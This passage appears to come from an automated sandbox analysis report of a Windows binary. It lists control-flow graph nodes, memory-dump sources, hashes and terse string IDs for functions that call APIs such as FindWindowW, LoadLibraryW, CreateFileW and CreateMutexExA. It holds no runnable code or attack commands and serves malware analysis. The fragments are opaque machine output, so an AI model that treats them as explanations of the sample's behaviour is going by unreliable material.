7ff7d50c343d-7ff7d50c3442 1308->1323 1309->1264 1324 7ff7d50c32a7-7ff7d50c32b8 FindCloseChangeNotification 1309->1324 1310->1311 1311->1264 1312->1264 1325 7ff7d50c32de-7ff7d50c32f1 1312->1325 1313->1264 1314->1264 1315->1264 1326 7ff7d50c30be-7ff7d50c3120 1315->1326 1316->1264 1317->1264 1329 7ff7d50c3317-7ff7d50c3329 call 7ff7d5085770 1317->1329 1318->1264 1330 7ff7d50c31cb-7ff7d50c31d0 1318->1330 1319->1264 1320->1264 1340 7ff7d50c3228-7ff7d50c322d 1320->1340 1322->1264 1332 7ff7d50c327c-7ff7d50c3281 1322->1332 1323->1264 1324->1264 1325->1264 1333 7ff7d50c3122 1326->1333 1334 7ff7d50c3127-7ff7d50c3131 1326->1334 1335 7ff7d50c3507-7ff7d50c3522 1327->1335 1328->1335 1329->1264 1330->1264 1332->1264 1333->1334 1334->1264 1340->1264
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "Yba$"Yba$JC<.$KC<.$KC<.$fkB2$gkB2$gkB2
                                                • API String ID: 0-2770720463
                                                • Opcode ID: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
                                                • Instruction ID: 368032f7fdd89092e005f8cee4aca725bc776f3245d44902ea8a9d3851159d46
                                                • Opcode Fuzzy Hash: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
                                                • Instruction Fuzzy Hash: 9AB19526A2D74597ED745629A0903FEE294EB46FD0FE00437ED8DC7794CE2DE8808752
                                                Function 00007FF7D50DFF60 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 308COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1341 7ff7d50dff60-7ff7d50dffa5 1342 7ff7d50dffc0-7ff7d50dffc5 1341->1342 1343 7ff7d50e0010-7ff7d50e0015 1342->1343 1344 7ff7d50dffc7-7ff7d50dffcc 1342->1344 1347 7ff7d50e00d0-7ff7d50e00d5 1343->1347 1348 7ff7d50e001b-7ff7d50e0020 1343->1348 1345 7ff7d50e0060-7ff7d50e0065 1344->1345 1346 7ff7d50dffd2-7ff7d50dffd7 1344->1346 1355 7ff7d50e0192-7ff7d50e0197 1345->1355 1356 7ff7d50e006b-7ff7d50e0070 1345->1356 1349 7ff7d50e010d-7ff7d50e0112 1346->1349 1350 7ff7d50dffdd-7ff7d50dffe2 1346->1350 1351 7ff7d50e00db-7ff7d50e00e0 1347->1351 1352 7ff7d50e01c7-7ff7d50e01cc 1347->1352 1353 7ff7d50e0026-7ff7d50e002b 1348->1353 1354 7ff7d50e013c-7ff7d50e0141 1348->1354 1371 7ff7d50e02fe-7ff7d50e03a6 FindWindowW 1349->1371 1372 7ff7d50e0118-7ff7d50e011d 1349->1372 1361 7ff7d50e01eb-7ff7d50e01f0 1350->1361 1362 7ff7d50dffe8-7ff7d50dffed 1350->1362 1365 7ff7d50e00e6-7ff7d50e00eb 1351->1365 1366 7ff7d50e02e9-7ff7d50e02f9 1351->1366 1369 7ff7d50e047f-7ff7d50e04af call 7ff7d50c5100 1352->1369 1370 7ff7d50e01d2-7ff7d50e01d7 1352->1370 1367 7ff7d50e0031-7ff7d50e0036 1353->1367 1368 7ff7d50e0237-7ff7d50e0247 1353->1368 1359 7ff7d50e03cb-7ff7d50e03e7 1354->1359 1360 7ff7d50e0147-7ff7d50e014c 1354->1360 1363 7ff7d50e0401-7ff7d50e046b 1355->1363 1364 7ff7d50e019d-7ff7d50e01a2 1355->1364 1357 7ff7d50e0076-7ff7d50e007b 1356->1357 1358 7ff7d50e0275-7ff7d50e02b3 call 7ff7d50c59d0 1356->1358 1373 7ff7d50e0081-7ff7d50e0086 1357->1373 1374 7ff7d50e02b8-7ff7d50e02e4 1357->1374 1358->1342 1359->1342 1380 7ff7d50e0152-7ff7d50e0157 1360->1380 1381 7ff7d50e03ec-7ff7d50e03fc 1360->1381 1361->1342 1383 7ff7d50dfff3-7ff7d50dfff8 1362->1383 1384 7ff7d50e01f5-7ff7d50e0232 call 7ff7d50c5260 1362->1384 1363->1342 1385 7ff7d50e0470-7ff7d50e047a 1364->1385 1386 7ff7d50e01a8-7ff7d50e01ad 1364->1386 1376 7ff7d50e00f1-7ff7d50e00f6 1365->1376 1377 7ff7d50dffa7-7ff7d50dffb3 1365->1377 1366->1342 1387 7ff7d50e024c-7ff7d50e0270 1367->1387 1388 7ff7d50e003c-7ff7d50e0041 1367->1388 1368->1342 1369->1342 1389 7ff7d50e04b4-7ff7d50e04b9 1370->1389 1390 7ff7d50e01dd-7ff7d50e01e6 1370->1390 1371->1342 1378 7ff7d50e0123-7ff7d50e0128 1372->1378 1379 7ff7d50e03ab-7ff7d50e03c6 1372->1379 1373->1342 1392 7ff7d50e008c-7ff7d50e00c5 call 7ff7d50e47d0 * 2 1373->1392 1374->1342 1376->1342 1394 7ff7d50e00fc-7ff7d50e0108 1376->1394 1377->1342 1378->1342 1395 7ff7d50e012e-7ff7d50e0137 1378->1395 1379->1342 1380->1342 1396 7ff7d50e015d-7ff7d50e018d call 7ff7d50c5100 1380->1396 1381->1342 1383->1342 1399 7ff7d50dfffa-7ff7d50e000d 1383->1399 1384->1342 1385->1342 1386->1342 1400 7ff7d50e01b3-7ff7d50e01b7 1386->1400 1387->1342 1388->1342 1401 7ff7d50e0047-7ff7d50e005a 1388->1401 1389->1342 1398 7ff7d50e04bf-7ff7d50e04d9 1389->1398 1390->1342 1392->1342 1394->1342 1405 7ff7d50e01bc-7ff7d50e01c2 1395->1405 1396->1342 1399->1342 1400->1405 1401->1342 1405->1342
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %<L,$%<L,$-YV$-YV$-YV
                                                • API String ID: 0-1602977039
                                                • Opcode ID: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
                                                • Instruction ID: defbacf5fbdc3a7322f581daa97976d92c82a94c53b9fb3b42923ef5b5f299ff
                                                • Opcode Fuzzy Hash: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
                                                • Instruction Fuzzy Hash: 52D12E22A14B5986FB605B79D4812BDA3B0FF09B48FA88533EE4DD3B54DF38D5818351
                                                Function 00007FF7D50E5870 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1411 7ff7d50e5870-7ff7d50e588e 1412 7ff7d50e58a0-7ff7d50e58a5 1411->1412 1413 7ff7d50e5900-7ff7d50e5905 1412->1413 1414 7ff7d50e58a7-7ff7d50e58ac 1412->1414 1417 7ff7d50e59c0-7ff7d50e59c5 1413->1417 1418 7ff7d50e590b-7ff7d50e5910 1413->1418 1415 7ff7d50e5980-7ff7d50e5985 1414->1415 1416 7ff7d50e58b2-7ff7d50e58b7 1414->1416 1419 7ff7d50e5a4b-7ff7d50e5a50 1415->1419 1420 7ff7d50e598b-7ff7d50e5990 1415->1420 1421 7ff7d50e59eb-7ff7d50e59f0 1416->1421 1422 7ff7d50e58bd-7ff7d50e58c2 1416->1422 1423 7ff7d50e5a80-7ff7d50e5a85 1417->1423 1424 7ff7d50e59cb-7ff7d50e59d0 1417->1424 1425 7ff7d50e5916-7ff7d50e591b 1418->1425 1426 7ff7d50e5a2e-7ff7d50e5a33 1418->1426 1429 7ff7d50e5a56-7ff7d50e5a5b 1419->1429 1430 7ff7d50e5bed-7ff7d50e5c15 RtlRestoreThreadPreferredUILanguages 1419->1430 1431 7ff7d50e5996-7ff7d50e599b 1420->1431 1432 7ff7d50e5890-7ff7d50e5895 1420->1432 1439 7ff7d50e5bb3-7ff7d50e5bd4 1421->1439 1440 7ff7d50e59f6-7ff7d50e59fb 1421->1440 1433 7ff7d50e5ab0-7ff7d50e5ac1 1422->1433 1434 7ff7d50e58c8-7ff7d50e58cd 1422->1434 1435 7ff7d50e5a8b-7ff7d50e5a90 1423->1435 1436 7ff7d50e5c1a-7ff7d50e5c1f 1423->1436 1437 7ff7d50e59d6-7ff7d50e59db 1424->1437 1438 7ff7d50e5b9f-7ff7d50e5bae 1424->1438 1441 7ff7d50e5921-7ff7d50e5926 1425->1441 1442 7ff7d50e5aea-7ff7d50e5b0b 1425->1442 1427 7ff7d50e5bd9-7ff7d50e5be8 1426->1427 1428 7ff7d50e5a39-7ff7d50e5a3e 1426->1428 1427->1412 1428->1412 1443 7ff7d50e5a44-7ff7d50e5a46 1428->1443 1429->1412 1444 7ff7d50e5a61-7ff7d50e5a7b 1429->1444 1430->1412 1452 7ff7d50e5b54-7ff7d50e5b79 1431->1452 1453 7ff7d50e59a1-7ff7d50e59a6 1431->1453 1432->1412 1433->1412 1445 7ff7d50e58d3-7ff7d50e58d8 1434->1445 1446 7ff7d50e5ac6-7ff7d50e5ae5 1434->1446 1435->1412 1447 7ff7d50e5a96-7ff7d50e5aa0 1435->1447 1436->1412 1454 7ff7d50e5c24-7ff7d50e5c29 1437->1454 1455 7ff7d50e59e1-7ff7d50e59e6 1437->1455 1438->1412 1439->1412 1440->1412 1456 7ff7d50e5a01-7ff7d50e5a29 1440->1456 1450 7ff7d50e592c-7ff7d50e5931 1441->1450 1451 7ff7d50e5b27-7ff7d50e5b4f 1441->1451 1448 7ff7d50e5b13-7ff7d50e5b22 1442->1448 1449 7ff7d50e5b0d 1442->1449 1443->1412 1444->1412 1445->1412 1457 7ff7d50e58da-7ff7d50e58f3 1445->1457 1446->1412 1447->1412 1458 7ff7d50e5aa6-7ff7d50e5aab 1447->1458 1448->1412 1449->1448 1450->1412 1459 7ff7d50e5937-7ff7d50e5964 1450->1459 1451->1412 1460 7ff7d50e5b81-7ff7d50e5b87 1452->1460 1461 7ff7d50e5b7b 1452->1461 1453->1412 1462 7ff7d50e59ac-7ff7d50e59b1 1453->1462 1454->1412 1463 7ff7d50e5c2f-7ff7d50e5c35 1454->1463 1455->1412 1456->1412 1457->1412 1458->1412 1465 7ff7d50e5966 1459->1465 1466 7ff7d50e596c-7ff7d50e597a 1459->1466 1467 7ff7d50e5b8f-7ff7d50e5b91 1460->1467 1468 7ff7d50e5b89 1460->1468 1461->1460 1462->1412 1465->1466 1466->1412 1467->1412 1469 7ff7d50e5b97-7ff7d50e5b9a 1467->1469 1468->1467 1469->1412
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: +I}$+I}
                                                • API String ID: 0-3898140586
                                                • Opcode ID: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
                                                • Instruction ID: f0bb628a7cc22a29801c4c411d82ee898b3bd94b26bcdf8e4808f0c5d4965805
                                                • Opcode Fuzzy Hash: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
                                                • Instruction Fuzzy Hash: AD811936E1C1098BEAB4A63865C013DE6909B85B60FF41937ED1ED77E1CE2DE8404B21
                                                Function 00007FF7D5074970 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1470 7ff7d5074970-7ff7d5074a09 1471 7ff7d5074a60-7ff7d5074a65 1470->1471 1472 7ff7d5074a67-7ff7d5074a6c 1471->1472 1473 7ff7d5074aa0-7ff7d5074aa5 1471->1473 1474 7ff7d5074a6e-7ff7d5074a73 1472->1474 1475 7ff7d5074a0b-7ff7d5074a17 SleepEx call 7ff7d50df520 1472->1475 1476 7ff7d5074aab-7ff7d5074ab0 1473->1476 1477 7ff7d5074ba5-7ff7d5074bb4 call 7ff7d50df520 1473->1477 1482 7ff7d5074a79-7ff7d5074a7e 1474->1482 1483 7ff7d5074b42-7ff7d5074ba0 1474->1483 1487 7ff7d5074a1c-7ff7d5074a52 1475->1487 1478 7ff7d5074bb9-7ff7d5074bbe 1476->1478 1479 7ff7d5074ab6-7ff7d5074b2b call 7ff7d50c2f40 1476->1479 1477->1471 1478->1471 1486 7ff7d5074bc4-7ff7d5074bec 1478->1486 1489 7ff7d5074b30-7ff7d5074b3d 1479->1489 1482->1471 1488 7ff7d5074a80-7ff7d5074a91 1482->1488 1483->1471 1487->1471 1488->1471 1489->1471
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .4[$ .4[
                                                • API String ID: 0-1397926279
                                                • Opcode ID: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
                                                • Instruction ID: 5275879db08ce1f6cf03b5325153e33e3c3eb33b130a2e9a5a093d6952aa63fb
                                                • Opcode Fuzzy Hash: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
                                                • Instruction Fuzzy Hash: FB51CB12A1AB8886E9115B39A4413A9E3A0BF99B94F944332FD8D53771EF3CE5C18701
                                                Function 00007FF7D50888F7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1490 7ff7d50888f7-7ff7d50888fc 1491 7ff7d50892d0-7ff7d50892d5 1490->1491 1492 7ff7d5088902-7ff7d5088907 1490->1492 1495 7ff7d50892db-7ff7d50892e0 1491->1495 1496 7ff7d508a52d-7ff7d508a562 1491->1496 1493 7ff7d5089adc-7ff7d5089b34 call 7ff7d50e6310 1492->1493 1494 7ff7d508890d-7ff7d5088912 1492->1494 1502 7ff7d5088380-7ff7d50883a6 1493->1502 1497 7ff7d5088918-7ff7d508891d 1494->1497 1498 7ff7d5089b39-7ff7d5089b46 1494->1498 1499 7ff7d50892e6-7ff7d50892eb 1495->1499 1500 7ff7d508a56a-7ff7d508a59c 1495->1500 1496->1500 1497->1502 1503 7ff7d5088923-7ff7d5088947 1497->1503 1506 7ff7d5089b50-7ff7d5089b6d 1498->1506 1507 7ff7d5089b48 1498->1507 1499->1502 1504 7ff7d50892f1-7ff7d5089302 1499->1504 1513 7ff7d5088781-7ff7d5088786 1502->1513 1514 7ff7d50883ac-7ff7d50883b1 1502->1514 1503->1502 1509 7ff7d5089304 1504->1509 1510 7ff7d508930c-7ff7d5089323 LoadLibraryW 1504->1510 1506->1502 1507->1506 1509->1510 1510->1502 1517 7ff7d5088ca4-7ff7d5088ca9 1513->1517 1518 7ff7d508878c-7ff7d5088791 1513->1518 1515 7ff7d50883b7-7ff7d50883bc 1514->1515 1516 7ff7d50889e8-7ff7d50889ed 1514->1516 1521 7ff7d5088f10-7ff7d5088f15 1515->1521 1522 7ff7d50883c2-7ff7d50883c7 1515->1522 1525 7ff7d50889f3-7ff7d50889f8 1516->1525 1526 7ff7d50893b4-7ff7d50893b9 1516->1526 1519 7ff7d5088caf-7ff7d5088cb4 1517->1519 1520 7ff7d508959c-7ff7d50895a1 1517->1520 1523 7ff7d50891a0-7ff7d50891a5 1518->1523 1524 7ff7d5088797-7ff7d508879c 1518->1524 1531 7ff7d5088cba-7ff7d5088cbf 1519->1531 1532 7ff7d5089fbd-7ff7d5089fcc 1519->1532 1539 7ff7d508a752-7ff7d508a7c8 1520->1539 1540 7ff7d50895a7-7ff7d50895ac 1520->1540 1537 7ff7d508a152-7ff7d508a16c call 7ff7d50e5870 1521->1537 1538 7ff7d5088f1b-7ff7d5088f20 1521->1538 1533 7ff7d508979b-7ff7d50897fd 1522->1533 1534 7ff7d50883cd-7ff7d50883d2 1522->1534 1529 7ff7d508a3b6-7ff7d508a3db 1523->1529 1530 7ff7d50891ab-7ff7d50891b0 1523->1530 1541 7ff7d50887a2-7ff7d50887a7 1524->1541 1542 7ff7d508999b-7ff7d50899c2 1524->1542 1527 7ff7d5089c0b-7ff7d5089c1d 1525->1527 1528 7ff7d50889fe-7ff7d5088a03 1525->1528 1535 7ff7d50893bf-7ff7d50893c4 1526->1535 1536 7ff7d508a665-7ff7d508a67e 1526->1536 1527->1502 1551 7ff7d5089c22-7ff7d5089c53 1528->1551 1552 7ff7d5088a09-7ff7d5088a0e 1528->1552 1529->1502 1543 7ff7d508a3e0-7ff7d508a425 call 7ff7d50e5750 1530->1543 1544 7ff7d50891b6-7ff7d50891bb 1530->1544 1553 7ff7d5089fd1-7ff7d5089fd6 1531->1553 1554 7ff7d5088cc5-7ff7d5088cca 1531->1554 1532->1502 1550 7ff7d508a4e5-7ff7d508a4fa 1533->1550 1555 7ff7d5089802-7ff7d5089807 1534->1555 1556 7ff7d50883d8-7ff7d50883dd 1534->1556 1545 7ff7d508a683-7ff7d508a695 1535->1545 1546 7ff7d50893ca-7ff7d50893cf 1535->1546 1536->1502 1537->1502 1558 7ff7d508a171-7ff7d508a18a 1538->1558 1559 7ff7d5088f26-7ff7d5088f2b 1538->1559 1539->1502 1540->1502 1547 7ff7d50895b2-7ff7d50895c6 1540->1547 1548 7ff7d50899c7-7ff7d50899e9 call 7ff7d50c6e50 1541->1548 1549 7ff7d50887ad-7ff7d50887b2 1541->1549 1542->1502 1543->1502 1543->1550 1544->1502 1560 7ff7d50891c1-7ff7d50891ce 1544->1560 1545->1502 1546->1502 1561 7ff7d50893d5-7ff7d5089416 1546->1561 1547->1502 1548->1502 1549->1502 1562 7ff7d50887b8-7ff7d50887ca 1549->1562 1550->1502 1551->1502 1552->1502 1564 7ff7d5088a14-7ff7d5088a2f 1552->1564 1553->1502 1554->1502 1565 7ff7d5088cd0-7ff7d5088cd5 1554->1565 1555->1502 1556->1502 1566 7ff7d50883df-7ff7d5088416 call 7ff7d50e5750 1556->1566 1558->1502 1559->1502 1568 7ff7d5088f31-7ff7d5088f52 1559->1568 1560->1502 1561->1502 1562->1502 1564->1502 1565->1502 1566->1502 1572 7ff7d5088f54 1568->1572 1573 7ff7d5088f5c-7ff7d5088f90 call 7ff7d508a9d0 call 7ff7d507cff0 1568->1573 1572->1573 1573->1502
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID: H]c
                                                • API String ID: 1029625771-2876529112
                                                • Opcode ID: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
                                                • Instruction ID: 2671df4661ee77bed67db6079feb9f35cc2cdfebf795297eba09a93d8d87eb67
                                                • Opcode Fuzzy Hash: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
                                                • Instruction Fuzzy Hash: 9E51983160D68682DE74B664E4947BEA790EB84B60FD40A33EEADC77D4CE3CD4408755
                                                Function 00007FF7D50C2BA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1580 7ff7d50c2ba0-7ff7d50c2bc0 1581 7ff7d50c2c10-7ff7d50c2c15 1580->1581 1582 7ff7d50c2c50-7ff7d50c2c55 1581->1582 1583 7ff7d50c2c17-7ff7d50c2c1c 1581->1583 1584 7ff7d50c2cc3-7ff7d50c2cc8 1582->1584 1585 7ff7d50c2c57-7ff7d50c2c5c 1582->1585 1586 7ff7d50c2c90-7ff7d50c2c95 1583->1586 1587 7ff7d50c2c1e-7ff7d50c2c23 1583->1587 1592 7ff7d50c2cca-7ff7d50c2ccf 1584->1592 1593 7ff7d50c2d37-7ff7d50c2d44 1584->1593 1588 7ff7d50c2d02-7ff7d50c2d13 1585->1588 1589 7ff7d50c2c62-7ff7d50c2c67 1585->1589 1590 7ff7d50c2d22-7ff7d50c2d32 1586->1590 1591 7ff7d50c2c9b-7ff7d50c2ca0 1586->1591 1594 7ff7d50c2ce2-7ff7d50c2ce7 1587->1594 1595 7ff7d50c2c29-7ff7d50c2c2e 1587->1595 1588->1581 1596 7ff7d50c2d18-7ff7d50c2d1d 1589->1596 1597 7ff7d50c2c6d-7ff7d50c2c72 1589->1597 1590->1581 1598 7ff7d50c2bc2-7ff7d50c2c02 CreateFileW 1591->1598 1599 7ff7d50c2ca6-7ff7d50c2cab 1591->1599 1600 7ff7d50c2cd1-7ff7d50c2cdd 1592->1600 1601 7ff7d50c2d49-7ff7d50c2d4e 1592->1601 1593->1581 1594->1581 1602 7ff7d50c2c34-7ff7d50c2c39 1595->1602 1603 7ff7d50c2cec-7ff7d50c2cfd 1595->1603 1596->1581 1597->1581 1604 7ff7d50c2c74-7ff7d50c2c85 1597->1604 1598->1581 1599->1581 1606 7ff7d50c2cb1-7ff7d50c2cbe 1599->1606 1600->1581 1601->1581 1605 7ff7d50c2d54-7ff7d50c2d63 1601->1605 1602->1581 1607 7ff7d50c2c3b-7ff7d50c2c4c 1602->1607 1603->1581 1604->1581 1606->1581 1607->1581
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: phV
                                                • API String ID: 0-1350728776
                                                • Opcode ID: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
                                                • Instruction ID: 1bd76665df91f867cc74fd4ecbd17a4950490e344880b4a8645d475a5cf20940
                                                • Opcode Fuzzy Hash: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
                                                • Instruction Fuzzy Hash: A441C821A0C54383EA70152994C137D9590AB56B74FE80B33DEBDC7BD5CE6DD8E05351
                                                Function 00007FF7D5076A50 Relevance: 3.3, APIs: 2, Instructions: 309COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1609 7ff7d5076a50-7ff7d5076aaa call 7ff7d506eb50 1612 7ff7d5076ad0-7ff7d5076ad7 1609->1612 1613 7ff7d5076ad9-7ff7d5076adf 1612->1613 1614 7ff7d5076b50-7ff7d5076b56 1612->1614 1617 7ff7d5076ae5-7ff7d5076aeb 1613->1617 1618 7ff7d5076bc0-7ff7d5076bc6 1613->1618 1615 7ff7d5076b5c-7ff7d5076b62 1614->1615 1616 7ff7d5076c10-7ff7d5076c16 1614->1616 1623 7ff7d5076c7c-7ff7d5076c82 1615->1623 1624 7ff7d5076b68-7ff7d5076b6e 1615->1624 1619 7ff7d5076c1c-7ff7d5076c22 1616->1619 1620 7ff7d5076cf7-7ff7d5076cfd 1616->1620 1621 7ff7d5076c4c-7ff7d5076c52 1617->1621 1622 7ff7d5076af1-7ff7d5076af7 1617->1622 1625 7ff7d5076bcc-7ff7d5076bd2 1618->1625 1626 7ff7d5076cc7-7ff7d5076ccd 1618->1626 1627 7ff7d5076c28-7ff7d5076c2e 1619->1627 1628 7ff7d5076e03-7ff7d5076e09 1619->1628 1631 7ff7d5076f03-7ff7d5076f16 1620->1631 1632 7ff7d5076d03-7ff7d5076d09 1620->1632 1633 7ff7d5076c58-7ff7d5076c5e 1621->1633 1634 7ff7d5076e35-7ff7d5076e3b 1621->1634 1629 7ff7d5076afd-7ff7d5076b03 1622->1629 1630 7ff7d5076d48-7ff7d5076d50 1622->1630 1637 7ff7d5076e4b-7ff7d5076e51 1623->1637 1638 7ff7d5076c88-7ff7d5076c8e 1623->1638 1635 7ff7d5076d8a-7ff7d5076d90 1624->1635 1636 7ff7d5076b74-7ff7d5076b7a 1624->1636 1639 7ff7d5076bd8-7ff7d5076bde 1625->1639 1640 7ff7d5076ddf-7ff7d5076de5 1625->1640 1641 7ff7d5076eea-7ff7d5076efe 1626->1641 1642 7ff7d5076cd3-7ff7d5076cd9 1626->1642 1643 7ff7d5076eb8-7ff7d5076ec7 1627->1643 1644 7ff7d5076c34-7ff7d5076c3c 1627->1644 1645 7ff7d5076f81-7ff7d5076f92 1628->1645 1646 7ff7d5076e0f-7ff7d5076e17 1628->1646 1657 7ff7d5076b09-7ff7d5076b11 1629->1657 1658 7ff7d5076e70-7ff7d5076e7e call 7ff7d50df570 1629->1658 1630->1612 1661 7ff7d5076d56-7ff7d5076d5e 1630->1661 1631->1612 1659 7ff7d5076f1b-7ff7d5076f2d 1632->1659 1660 7ff7d5076d0f-7ff7d5076d17 1632->1660 1649 7ff7d5076ecc-7ff7d5076edb 1633->1649 1650 7ff7d5076c64-7ff7d5076c6c 1633->1650 1647 7ff7d5076fb9-7ff7d5076fc1 1634->1647 1648 7ff7d5076e41-7ff7d5076e46 1634->1648 1664 7ff7d5076d96-7ff7d5076d9e 1635->1664 1665 7ff7d5076f32-7ff7d5076f4b 1635->1665 1662 7ff7d5076e83-7ff7d5076e93 call 7ff7d50e5870 1636->1662 1663 7ff7d5076b80-7ff7d5076b88 1636->1663 1651 7ff7d5076fc9-7ff7d5076fd1 1637->1651 1652 7ff7d5076e57-7ff7d5076e6b 1637->1652 1653 7ff7d5076c94-7ff7d5076c9c 1638->1653 1654 7ff7d5076ee0-7ff7d5076ee5 1638->1654 1666 7ff7d5076e98-7ff7d5076e9f 1639->1666 1667 7ff7d5076be4-7ff7d5076bec 1639->1667 1668 7ff7d5076deb-7ff7d5076df3 1640->1668 1669 7ff7d5076f64-7ff7d5076f7d 1640->1669 1641->1612 1655 7ff7d5076aac-7ff7d5076acb 1642->1655 1656 7ff7d5076cdf-7ff7d5076ce7 1642->1656 1643->1612 1644->1612 1671 7ff7d5076c42-7ff7d5076c47 1644->1671 1691 7ff7d5076f9c-7ff7d5076fb4 CreateMutexExA 1645->1691 1692 7ff7d5076f94 1645->1692 1646->1612 1680 7ff7d5076e1d-7ff7d5076e30 1646->1680 1647->1612 1670 7ff7d5076fc7 1647->1670 1648->1612 1649->1612 1650->1612 1673 7ff7d5076c72-7ff7d5076c77 1650->1673 1651->1612 1672 7ff7d5076fd7 call 7ff7d50e47d0 1651->1672 1652->1612 1653->1612 1674 7ff7d5076ca2-7ff7d5076cb6 1653->1674 1654->1612 1655->1612 1656->1612 1675 7ff7d5076ced-7ff7d5076cf2 1656->1675 1657->1612 1684 7ff7d5076b13-7ff7d5076b4b FindCloseChangeNotification 1657->1684 1658->1612 1659->1612 1660->1612 1676 7ff7d5076d1d-7ff7d5076d38 1660->1676 1661->1612 1677 7ff7d5076d64-7ff7d5076d85 1661->1677 1662->1612 1663->1612 1686 7ff7d5076b8e-7ff7d5076bb6 